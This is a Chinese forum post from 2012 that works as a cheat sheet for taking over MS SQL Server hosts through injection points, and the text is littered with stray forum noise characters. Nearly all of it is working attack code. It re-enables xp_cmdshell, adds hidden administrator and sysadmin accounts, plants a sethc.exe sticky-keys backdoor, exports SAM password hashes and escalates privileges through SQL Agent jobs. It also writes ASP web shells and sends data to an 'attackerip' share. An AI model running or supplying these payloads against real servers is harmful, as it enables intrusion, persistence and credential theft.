1 未能找到存储过程'master..xpcmdshell'. EXEC master.dbo.sp_addextendedproc 后用下面的三种方法,在注入点上执行加个空格和;号
& L- z/ h" K0 W恢复方法:查询分离器连接后,
2 x& y+ I2 H1 I4 q8 K2 W% R第一步执行:EXEC sp_addextendedproc xp_cmdshell,@dllname ='xplog70.dll'declare @o int
: S' d P6 h4 V5 h! U9 Y第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'
( i# H5 G, ?$ p& g) G然后按F5键命令执行完毕' `/ E* R) @3 B, s" H
6 c$ `. }" \ g7 M
2 无法装载 DLL xpsql70.dll 或该DLL所引用的某一 DLL。原因126(找不到指定模块。)" @: D ~9 [0 ]# s
恢复方法:查询分离器连接后,
+ s' |3 _; g: i( b/ ~第一步执行:EXEC master.dbo.sp_dropextendedproc "xp_cmdshell" K4 l; H4 U% b2 ]: u y
第二步执行:EXEC master.dbo.sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'
. c: h5 G: d/ d# P+ g8 r: {6 u: V然后按F5键命令执行完毕
) j* n6 q, K; x' X3 b/ j% T7 v( g' `- K j! e8 p
3 无法在库 xpweb70.dll 中找到函数 xp_cmdshell。原因: 127(找不到指定的程序。)
3 B( K8 N9 p6 G8 _1 g恢复方法:查询分离器连接后,3 k" {/ J5 o, ], l$ _) B5 q! U
第一步执行:exec sp_dropextendedproc 'xp_cmdshell'
5 l% Q# {7 ~7 a4 [1 } E( H0 w第二步执行:exec sp_addextendedproc 'xp_cmdshell','xpweb70.dll'
5 ]& ~, W6 b( R8 A# R然后按F5键命令执行完毕
& @' Q y! K+ q$ L1 M
6 M( m7 q. H( ]3 {4 终极方法.% i) e1 Z- s' Q8 U& @8 I2 R
如果以上方法均不可恢复,请尝试用下面的办法直接添加帐户:
0 u& u( R J5 _ }! D7 {0 k查询分离器连接后,! h( J1 s! }0 \9 P; ^5 ]+ y; X; Q
2000servser系统:4 Q \# S* a0 }6 M0 x
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net user 新用户 密码 /add'
4 n0 C. `7 d3 E' b* v$ ^ Z' B5 j- a
7 q0 E! {% E5 P4 u7 M' Ldeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net localgroup administrators 新用户 /add'
& u! D4 j" d8 p, L7 V% d1 h3 Q, a$ [% y. Z! t% c$ ?. W7 s
xp或2003server系统:
9 l% F6 M. @( G \( ~3 \! q* P
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user 新用户 密码 /add'
6 D# |; p& G5 q$ ~9 p7 L
8 y; p) r! y: q: v2 P- d3 O3 kdeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrators 新用户 /add'
- Q/ P9 J( p& K% h/ y" ]: v$ q3 w
/ I! W2 I9 z ]% R) E0 V7 h五个SHIFT# b& p3 t1 M ]/ b9 F
declare @o int exec sp_oacreate 'scripting.filesystemobject', @o out exec sp_oamethod @o, 'copyfile',null,'c:\windows\explorer.exe' ,'c:\windows\system32\sethc.exe';2 b) U/ E8 P4 o+ v- r0 z
5 W+ j% J" C$ r8 Z# k, Y
declare @oo int exec sp_oacreate 'scripting.filesystemobject', @oo out exec sp_oamethod @oo, 'copyfile',null,'c:\windows\system32\sethc.exe' ,'c:\windows\system32\dllcache\sethc.exe'; * j8 A9 V% z1 T9 [( `$ B" u+ N
1 \3 M# n# n) |6 {xp_cmdshell执行命令另一种方法2 K1 g2 s1 M; [2 B( Y
declare @a sysname set @a='xp_'+'cmdshell' exec @a 'net user refdom 123456 /add'
; c1 L* x- t! u$ [4 D/ W
9 }/ \9 E+ R8 G4 a- t判断存储扩展是否存在! S9 R0 g- r0 d# ?
Select count(*) from master.dbo.sysobjects where xtype='X' and name='xp_cmdshell'0 M0 V- p5 s. h) D# Q
返回结果为1就OK( o+ F& v0 {- d9 {9 j/ a
! n2 n7 I% d# {; o( d2 ?
+ r/ m! ~5 ]/ z3 z$ j V' m上传xplog70.dll恢复xp_cmdshell语句:# }0 M/ s) F) N9 [8 H
sp_addextendedproc xp_cmdshell,@dllname='E:\newche2\about\XPLOG70.DLL'8 a3 ?# r3 j }* i
; w$ t# c( `: T' d5 S2 @否则上传xplog7.0.dll
6 K' Q5 R& x- k8 a4 J5 A7 NExec master.dbo.addextendedproc 'xp_cmdshell','C:\WinNt\System32\xplog70.dll'
/ N; \. Q4 ~1 p( x, X
3 s: R2 l J" l# E" H4 {7 `; ]8 \) F9 r: [3 t2 x, M* Y. B/ H
8 W0 C0 u9 d; n2 U* l- l: L& @首先开启沙盘模式:& m7 B/ i" y# l% l1 R
exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1, `" o8 l8 P! p- R8 ]
! X, w' u2 Q' W0 q) `$ _# h/ I
然后利用jet.oledb执行系统命令7 \. G2 @' ^9 F W2 M# ?
select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\winnt\system32\ias\ias.mdb','select shell("cmd.exe /c net user admin admin1234 /add")'): C8 f4 Z& f( J, ^
返回 不能找到c:\windows\system32\ias\ias.mdb错误,用exec master..xp_dirtree 'c:\windows\system32\ias\ias',1,1-- 发现c:\windows\system32\ias\ias.mdb没了,应该是被管理员删掉了,还有另一个mdb也没了& ?/ {0 }8 a) m. K# H
: T4 o* l4 K9 F8 l/ T7 I- R4 A: n+ h8 R/ V2 V& Y! Y$ g9 b
9 C5 C1 }: H: v( u+ h恢复过程sp_addextendedproc 如下: ( b7 Q) `! J0 ^2 ~
create procedure sp_addextendedproc --- 1996/08/30 20:13
. r B+ m I* S. M@functname nvarchar(517),/* (owner.)name of function to call */ + q8 Q5 K8 g! S1 O( [
@dllname varchar(255)/* name of DLL containing function */
1 o" q) ~) c, O* Oas
5 m N, Q3 ]+ p# }- P3 j& cset implicit_transactions off
7 `) z8 t+ M6 x# X. B6 F8 Jif @@trancount > 0 - Y- w' a6 n% e* ?6 f) C
begin
0 M' c+ v1 q8 k0 ~% ^raiserror(15002,-1,-1,'sp_addextendedproc')
- n% E- i! m0 O2 h! m/ P( u# ` h- oreturn (1)
- T f7 S( {5 X R4 a, a m1 q$ s7 D* v- gend , j# T d/ j( O v6 y7 g) m' D! t- O
dbcc addextendedproc( @functname, @dllname)
0 J0 f1 A/ M$ V* zreturn (0) -- sp_addextendedproc
% f) I- n, Q' E L. }, VGO 2 k* t! b& q, v: ]
7 i5 T' k8 x. z. R( f+ f+ x
& ]9 @! Y+ H9 @8 v f( u, L" j8 I% b; `: N) e% s6 t
导出管理员密码文件$ x" L! O6 D8 @ t" o5 e( F1 u# q
sa默认可以读sam键.应该。
" Y( E" X; U* xreg export HKLM\SAM\SAM\Domains\Account\Users\000001F4 c:\old.reg
; C# j8 A$ |3 U7 _, cnet user administrator test
% g* e2 G* X2 h8 {% t- F用administrator登陆.
# @6 ?" _3 w& T' D$ r4 [! r# J% W用完机器后
8 l6 e6 v4 Z8 i. lreg import c:\test.reg
. _0 a, k0 K7 b4 q* [, l8 X根本不用克隆.! \; B; U' C0 S9 f6 `7 M# l1 l
找到对应的sid. ' [# D7 I# ~* v/ c3 Q
, Q1 D* I& u+ U0 E
$ G) h- ^" c) M% @- i- F# z0 k9 P4 ]7 [; T* ~; h
恢复所有存储过程
# Y+ `5 E3 N2 kuse master
$ A1 Z) F8 ?4 J# Kexec sp_addextendedproc xp_enumgroups,'xplog70.dll'
6 g4 _+ I; r+ B+ r d( e% `exec sp_addextendedproc xp_fixeddrives,'xpstar.dll' / w$ c6 e# Z) {% L' L
exec sp_addextendedproc xp_loginconfig,'xplog70.dll'
; l0 u8 J6 s# y0 C/ M, ]exec sp_addextendedproc xp_enumerrorlogs,'xpstar.dll'
* Y$ G1 C+ G1 R9 U$ [1 \exec sp_addextendedproc xp_getfiledetails,'xpstar.dll' ; O9 v$ ]' w% J- T+ C
exec sp_addextendedproc sp_OACreate,'odsole70.dll'
/ l! v8 _3 F8 `6 iexec sp_addextendedproc sp_OADestroy,'odsole70.dll' - k: H7 ~3 _$ e
exec sp_addextendedproc sp_OAGetErrorInfo,'odsole70.dll' ! s9 q9 g1 B6 w+ s9 G
exec sp_addextendedproc sp_OAGetProperty,'odsole70.dll' 9 w. n1 @4 ~) {* s3 O
exec sp_addextendedproc sp_OAMethod,'odsole70.dll'
$ H+ J! q7 B% m: ?: Bexec sp_addextendedproc sp_OASetProperty,'odsole70.dll'
! |; |2 z; s0 x% lexec sp_addextendedproc sp_OAStop,'odsole70.dll' * F3 ]* Z, b! Q$ `
exec sp_addextendedproc xp_regaddmultistring,'xpstar.dll'
8 l# r! a* V) n3 Lexec sp_addextendedproc xp_regdeletekey,'xpstar.dll'
# E1 s: y- Z5 I5 Vexec sp_addextendedproc xp_regdeletevalue,'xpstar.dll' 2 ^, C( m& C* ?& R4 Y. w
exec sp_addextendedproc xp_regenumvalues,'xpstar.dll' & M5 j- _3 s- A
exec sp_addextendedproc xp_regread,'xpstar.dll'
% G% Q4 K5 w1 Texec sp_addextendedproc xp_regremovemultistring,'xpstar.dll' 2 F0 K; ?% l* y% [8 d Y( S
exec sp_addextendedproc xp_regwrite,'xpstar.dll'
* V' ?% L( o9 C9 T# l% a9 Zexec sp_addextendedproc xp_availablemedia,'xpstar.dll' H! I1 }- Z. T5 I$ v. |' ]/ i
! I; @) G3 ]. R1 j7 ]6 R: k# L9 y" F& `" U. s: T
建立读文件的存储过程
( q7 Z4 s z5 |8 h* N _; e! @/ XCreate proc sp_readTextFile @filename sysname8 x3 r2 R+ y& w, X( W1 R8 g- z
as
: h; l% I6 k% K, r
# Z* i1 N3 D; E3 y+ d1 V begin
% ]+ I# N9 g! p' I2 w set nocount on
9 y3 f6 g. c$ |: t/ S/ L Create table #tempfile (line varchar(8000))" B8 @& }+ g+ n& ]3 W/ s, ], h b5 K
exec ('bulk insert #tempfile from "' + @filename + '"')( K+ W/ S2 ~% M: k% ~
select * from #tempfile2 |% ?" q. O* A% p' `- ^8 e T
drop table #tempfile
- ~+ s2 o' A0 s& Z! m2 s. DEnd
: D e4 c$ x( ?4 _- K, H3 D- F5 U3 u r* m8 m! N+ K+ v2 G3 m
exec sp_readTextFile 'D:\testjun17\Teleweb-Japan\default.asp' 利用建立的存储过程读文件
5 @5 H- i2 ~, V. U查看登录用户4 z' n2 Z8 K; S4 g6 {9 g7 r' @
Select * from sysxlogins$ G* t: Z, {& C7 a
! G. x; [# i0 J
把文件内容读取到表中+ m6 e7 i* f/ ^) w& Q, ]2 z
BULK INSERT tmp from "c:\test.txt"
0 u1 M" b* J6 PdElete from 表名 清理表里的内容
8 L& ~9 O& G; l2 v8 r8 Y& D2 P9 ?create table b_test(fn nvarchar(4000));建一个表,字段为fn
- P) a/ n! l) T1 a; I- w. ?' c3 a) `. i/ n& Y" Y0 s3 O H
, W D4 [# z) |" @/ B! R) p加sa用户7 ^7 b+ @: T" p8 I: c5 Z
exec master.dbo.sp_addlogin user,pass;4 \/ A& ?7 n3 h. }
exec master.dbo.sp_addsrvrolemember user,sysadmin) s& p/ w9 Z, J' u; L
+ w# d6 n; F, g$ Q. r+ \
8 N5 Y- {! {' X* J. B& i4 U6 F5 S/ v* Z' L. [! D# V
读文件代码$ S, |9 j5 A. Y" b1 x
declare @o int, @f int, @t int, @ret int
7 c$ W8 o+ s9 K f$ M7 H( Jdeclare @line varchar(8000)
2 _/ O' w4 F8 z4 Cexec sp_oacreate 'scripting.filesystemobject', @o out
& c m0 |! z9 c# N* `exec sp_oamethod @o, 'opentextfile', @f out, '文件名', 1
( a( D0 z: `/ q0 g" |( X- X6 ]9 h; nexec @ret = sp_oamethod @f, 'readline', @line out; A ~5 _$ S! L4 K/ Q* ?" I
while( @ret = 0 )
8 v4 q0 a( L8 S2 t# |' Fbegin0 U' Y) `/ y* f- W; S& d
print @line
8 O# K# h% Y# l1 qexec @ret = sp_oamethod @f, 'readline', @line out% ?# y. N+ T# ^2 G
end
+ s8 p$ w' a- T1 x
4 ]9 i% k/ S# N# E& N# @& Q+ U2 V2 g& q5 @7 T! R4 E. Y: o8 s
写文件代码:
; ^( s4 F5 `4 R* a [& mdeclare @o int, @f int, @t int, @ret int# E5 ~6 Y& U/ Q. g8 N: }; j
exec sp_oacreate 'scripting.filesystemobject', @o out9 Y1 B- \+ i$ G% u
exec sp_oamethod @o, 'createtextfile', @f out, 'd:\Program Files\RhinoSoft.com\Serv-U\ServUDaemon.ini', 1
8 G1 n8 _* ~$ c* ~9 @# A8 d) aexec @ret = sp_oamethod @f, 'writeline', NULL, 《内容》, h5 Z- f3 Q2 q, C
2 k6 ?# q( G" L# v
% X' s+ A7 t5 q6 i添加lake2 shell
3 J5 x" j% O [' s- k! F" ?& osp_addextendedproc 'xp_lake2', 'c:\recycler\xplake2.dll'
5 T; _2 f+ l$ n4 H3 y8 j C+ v! lsp_dropextendedproc xp_lake2
$ a1 B; }4 e" R, f0 ^( J4 pEXEC xp_lake2 'net user'7 R0 L# U: V9 b$ m. t5 s
2 q) h, j3 T k
0 @. o- v2 w2 ^+ R
得到硬盘文件信息 4 q, b- N1 Z/ J; L4 z/ ~; Y
--参数说明:目录名,目录深度,是否显示文件 . h& O2 M1 a; e3 K* j$ r' _
execute master..xp_dirtree 'c:'
) Q6 W' V; Q& r' ? xexecute master..xp_dirtree 'c:',1 1 e& [, t& G" l9 X( |
execute master..xp_dirtree 'c:',1,1 . \: g; l1 k$ H4 r, N3 p
8 e( ^" k v$ P* d; b: \: c# C! y, d4 l
读serv-u配置信息
+ Z* G2 `- N8 Xexec sp_readTextFile 'd:\Program Files\RhinoSoft.com\Serv-U\ReadMe.txt'
@/ @, Z. H G5 d! x. y ^1 Cexec sp_readTextFile 'd:\Program Files\RhinoSoft.com\Serv-U\ServUDaemon.ini'
/ M7 G; q0 ~8 P, `
( W9 K6 ~8 [7 i5 d8 a) Z通过xp_regwrite写SHIFT后门1 T* e" g! Q! [
exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe','debugger','REG_sz','c:\windows\system32\cmd.exe on';--
" y% Y( Y+ {) t" R" b: M" |0 ~" s! I0 P: ^, _6 R
n+ E/ C/ T0 j( Q# Z8 e2 ?
5 R( ~7 m! \% x0 N+ E" A
找到web路径然后用exec master.dbo.xp_subdirs 'd:\web\www.xx.com';
( h# i. G" c2 f. M5 V* ?' L1 Aexec sp_makewebtask 'd:\web\www.XXXX.com\XX.asp','select''<%execute(request("SB"))%>'' '备 份一个小马就可以了
7 P* q& {) S% c) E4 c* Y7 j* D4 F3 l1 B( T+ Q; F2 h& {; I
EXECUTE sp_makewebtask @outputfile = ‘WEB绝对路径\导出的文件名.asp',@query = 'SELECT 你的字段 FROM 你建的临时表'
. A3 v1 O& e. d }3 [* `) P7 s) y1 b v3 }+ Y# c
$ R+ C+ k' s7 ?& _- ]3 P7 @
# C, l3 e7 l! D4 l: msql server 2005下开启xp_cmdshell的办法% f8 u2 S; E0 [$ d, V: l! ~6 O
# C/ U/ @/ i* q- [0 W5 B4 D1 t HEXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;
9 P+ K# {4 \1 A! p8 n% m6 W
& H, W8 f7 g7 ESQL2005开启'OPENROWSET'支持的方法:
- E* n8 r3 f& |" S3 ] r2 [: `: O& ^2 ~) O- k% X% F3 ?0 m
exec sp_configure 'show advanced options', 1;RECONFIGURE;exec sp_configure 'Ad Hoc Distributed Queries',1;RECONFIGURE;# y3 S# c. H/ C Y+ U9 ^
( k# o" ~) ]+ A3 t- q
SQL2005开启'sp_oacreate'支持的方法:6 ]4 I3 i! W& [8 [0 ?$ @
: t$ R. ^/ ]+ }6 h
exec sp_configure 'show advanced options', 1;RECONFIGURE;exec sp_configure 'Ole Automation Procedures',1;RECONFIGURE;4 ^9 \/ T% ?2 q( I) I7 r
& E" s$ L3 z$ x5 \/ Z
3 {9 U' m' `, L( [% S
3 M+ }# A8 T* d3 l# x
! k. j7 R2 m- Q, l% @, X( z" I
9 v* k2 ]6 Y* ]2 O! v3 G0 ~+ w. H! t7 a
* K. J6 x+ I' \! s$ Y0 f* H% ^; }, K
! M/ n- i* {" Z$ R) i' G
: i; E2 N6 G2 i
" U7 W) j) k7 @- I8 ~2 {5 H s/ B: E* ?3 L6 `( @1 u( V, k
8 U. z# P$ S$ c* ?- N+ {
# s5 N" M* _& n1 K# Z5 h! P' p- ^- ]" B
/ B7 S4 b' V: C" r1 f$ z
$ s3 v1 X+ s( Y6 ]* u7 s5 ?( W1 \
9 A6 s; _7 I8 Z" C/ z6 ]$ L# C0 P/ e+ G5 u' x6 e! _- [
! P( w# i) m0 r* H$ Z8 ~/ l! c: u' e( L2 L4 t9 N' \
$ n' I4 Y, y, I, p9 ?+ `
8 n/ d/ T! V1 l( S. j0 Q+ }
; h2 n8 V" p2 Z9 N5 m以下方面不知道能不能成功暂且留下研究哈:
4 w1 q! c7 M. b4 o4)
) I0 j2 D4 C) |5 D' yuse msdb; --这儿不要是master哟2 R. k. T$ R3 d* y
exec sp_add_job @job_name= czy82 ;
" H: D' Y3 b' @" \+ Z; nexec sp_add_jobstep @job_name= czy82 ,@step_name = Exec my sql ,@subsystem= CMDEXEC ,@command= dir c:\>c:\b.txt ;
6 \( E# P4 o0 n5 E5 j9 f# Nexec sp_add_jobserver @job_name = czy82 ,@server_name = smscomputer ;
- E) N* Y0 L+ f6 yexec sp_start_job @job_name= czy82 ;, ~- F R4 m6 y) q* }! ^- W
' L2 {0 A0 Q' K/ d9 b利用MSSQL的作业处理也是可以执行命令的而且如果上面的subsystem的参数是tsql,后面的我们就可以
5 `. i7 P7 P6 {9 e8 ?执行tsql语句了.& \. Z: ?6 _3 ~3 i3 k3 O" j$ k: N: `
对于这几个储存过程的使用第一在@server_name我们要指定你的sql的服务器名5 W+ u' S* Z: i
第二系统的sqlserveragent服务必须打开(默认没打开的气人了吧)
{+ J5 @+ R- fnet start SQLSERVERAGENT
6 B4 o5 L& {- d: W8 @; h
1 M( e1 t# w$ e; B- R$ [对于这个东东还有一个地方不同就是public也可以执行..同这儿也是有系统洞洞的看下面的" `; S b$ X: S, P9 e
USE msdb8 A3 u) g; n2 c2 n8 A' `8 f4 e
EXEC sp_add_job @job_name = GetSystemOnSQL ,
; |+ [, g( H( A$ r0 `: s" O3 E+ m6 a@enabled = 1,
7 d* ^9 W1 G+ S" I@description = This will give a low privileged user access to
) V$ [, |; ^; f, i# q4 ~$ ?9 cxp_cmdshell ,2 e% _6 @; H) t& Y) N8 H
@delete_level = 11 B! P. ^8 M9 O; L$ @
EXEC sp_add_jobstep @job_name = GetSystemOnSQL ,
7 s* d! W$ f) p( B3 S7 J@step_name = Exec my sql ,8 R# V% n9 p* h/ H
@subsystem = TSQL ,
$ W/ J! i+ A' X$ e6 \2 Z@command = exec master..xp_execresultset N select exec
! [+ O+ m6 W. U+ ?* H6 G2 u2 R4 Omaster..xp_cmdshell "dir > c:\agent-job-results.txt" ,N Master
7 A( T2 v( L- r0 c3 F8 T: `* D4 tEXEC sp_add_jobserver @job_name = GetSystemOnSQL ,- n) ^2 y* r7 L- D- W& `
@server_name = 你的SQL的服务器名
% v% I- R2 _" D- j1 v0 K9 YEXEC sp_start_job @job_name = GetSystemOnSQL
3 F( }2 h, U i5 z" h0 `6 u' B6 e; q
不要怀疑上面的代码,我是测试成功了的!这儿我们要注意xp_execresultset就是因为它所以
, ~& I* h$ e, u才让我们可以以public执行xp_cmdshell
H% }; H. `, t0 k1 e# m4 Y1 Y7 w! m' `
5)关于Microsoft SQL Agent Jobs任意文件可删除覆盖漏洞(public用户也可以)
! T3 E( |% i; x6 r在安焦有文章:http://www.xfocus.net/vuln/vul_view.php?vul_id=29688 a t: s$ L% [: |, Z6 W0 N
0 I7 K( @2 Z( c' |' Y1 @5 Q
USE msdb: |1 Q! H/ B- N$ e; a* W" D
EXEC sp_add_job @job_name = ArbitraryFilecreate ,2 \1 q, X8 b. r, O) L b9 y
@enabled = 1,
8 b$ [5 k1 b+ ]3 } E@description = This will create a file called c:\sqlafc123.txt ,
8 F0 q7 {3 J& H3 e8 N9 x: ]@delete_level = 1+ u( {1 U0 L: O$ z; e0 c- u% Z
EXEC sp_add_jobstep @job_name = ArbitraryFilecreate ,
, R5 h5 V$ J! _6 _9 D* k8 B@step_name = SQLAFC ,/ ]) ?% t' S5 u4 K" ^
@subsystem = TSQL ,& }8 I3 \1 h' q( o* I
@command = select hello, this file was created by the SQL Agent. ,
! @/ I: Q9 G9 [: h H/ |6 V- C E+ L@output_file_name = c:\sqlafc123.txt
, V6 ^& _9 R2 B! j! c* w( qEXEC sp_add_jobserver @job_name = ArbitraryFilecreate ,6 v" W2 N+ {9 J# f7 S4 M( n" o
@server_name = SERVER_NAME
% a) W1 ^+ }7 @EXEC sp_start_job @job_name = ArbitraryFilecreate * q& {7 X. U- C, Y& z' E- _8 R
+ Y- ~! V/ b. e7 k
如果subsystem选的是:tsql,在生成的文件的头部有如下内容) g7 y$ z; {1 @
8 Q: Z& {' s2 N9 E6 t/ |) u??揂rbitraryFilecreate? ? 1 ?,揝QLAFC? ???? 2003-02-07 18:24:19% D" x' n' p" d& G# Y
----------------------------------------------$ A& N% J f0 D" ?7 y! Z% t+ |+ y; S
hello, this file was created by the SQL Agent.3 V# E; ?$ R: r) ~
! W& E' W& P [% y$ f
(1 ?????)7 `* N( T" Y( ?6 g8 ^
2 ^; |+ ^4 o: z3 d$ s7 |9 D所以我建议要生成文件最好subsystem选cmdexec,如果利用得好我们可以写一个有添加管理员
$ W6 E* S6 _0 X; U) u9 ?" L命令的vbs文件到启动目录!# s% |& N h, t
9 m8 t- \" ?# k& m. [$ z; G4 d+ x& p* ]; J6)关于sp_makewebtask(可以写任意内容任意文件名的文件)
0 l! p4 F9 C: h关于sp_MScopyscriptfile 看下面的例子
& r$ p& d8 T" c( }3 N; t3 X, |declare @command varchar(100) 5 N2 ?4 w, {- X0 t+ ~3 h v0 O
declare @scripfile varchar(200) ' j! |2 y5 V) ^3 b2 [
set concat_null_yields_null off
- n: [6 L! E8 v6 Y4 pselect @command= dir c:\ > "\\attackerip\share\dir.txt"
4 B D9 v$ U0 l. g: \! Kselect @scripfile= c:\autoexec.bat > nul" | @command | rd " 8 [) B2 H; a; M6 v3 l1 z2 S1 O) J! K$ t9 K
exec sp_MScopyscriptfile @scripfile , 0 P0 N* @5 ~% B% f6 x/ y4 m
% J# h2 P5 U q% [这两个东东都还在测试试哟* a$ M, D) Z7 `; `# N. V
让MSSQL的public用户得到一个本机的web shell
0 U$ I6 j( b* H6 Y) Z& R
4 P& q/ ]+ k) n) [: J9 Msp_makewebtask @outputfile= d:\sms\a.asp ,@charset=gb2312,/ }. t$ [* V- z, j1 N
--@query= select <img src=vbscript:msgbox(now())> 5 ^/ {6 r/ S# e
--@query= select <%response.write request.servervariables("APPL_PHYSICAL_PATH")%>
% k: |7 ?% T7 N@query= select 1 B. f( x. Y, q( Z, W! N
<%On Error Resume Next
D" u5 C8 M# Y7 a& X3 lSet oscript = Server.createObject("wscript.SHELL")
7 W# V- }, D1 f+ \6 ~# MSet oscriptNet = Server.createObject("wscript.NETWORK") 6 k# g# F3 H( C% e7 I) Z2 |
Set oFileSys = Server.createObject("scripting.FileSystemObject")
" r9 d8 x1 K2 b# H; n7 W& b7 K l" XszCMD = Request.Form(".CMD") - V+ I9 ^- t0 f4 [8 A3 U
If (szCMD <>"")Then
2 ]: _4 ]8 u" t+ g7 i0 qszTempFile = "C:\" & oFileSys.GetTempName() 2 y9 p6 F3 }4 H o; u
Call oscript.Run ("cmd.exe /c " & szCMD & " > " & szTempFile, 0, True)
f) y' W) z- F5 ISet oFile = oFilesys.OpenTextFile (szTempFile, 1, False, 0) ) Q' I! K1 c" I0 \2 q$ u
End If %>
" {5 b2 ]4 e; }0 `<HTML><BODY><FORM action="<%= Request.ServerVariables("URL")%>" method=" OST"> S1 {! K$ [4 D# N/ b
<input type=text name=".CMD" size=45 value="<%= szCMD %>"><input type=submit value="Run">
& I, A7 \' k0 Z; l* d$ L</FORM><RE> 5 ~& s& [4 C0 n
<% If (IsObject(oFile))Then # [& f; M" E; ^5 ^# o1 T
On Error Resume Next
4 C2 q9 d' j9 H+ uResponse.Write Server.HTMLEncode(oFile.ReadAll)
4 C \, _6 z ]* H' MoFile.Close - _2 F* d2 r' R& d! O7 |
Call oFileSys.deleteFile(szTempFile, True) - F7 i: A" g3 v9 q5 }; o v
End If%>
* } \* y" |) e% Q" n6 B: D# `</BODY></HTML> 0 q4 t8 @; R3 W
|
发表于 2012-9-15 14:37:30
收藏
支持
反对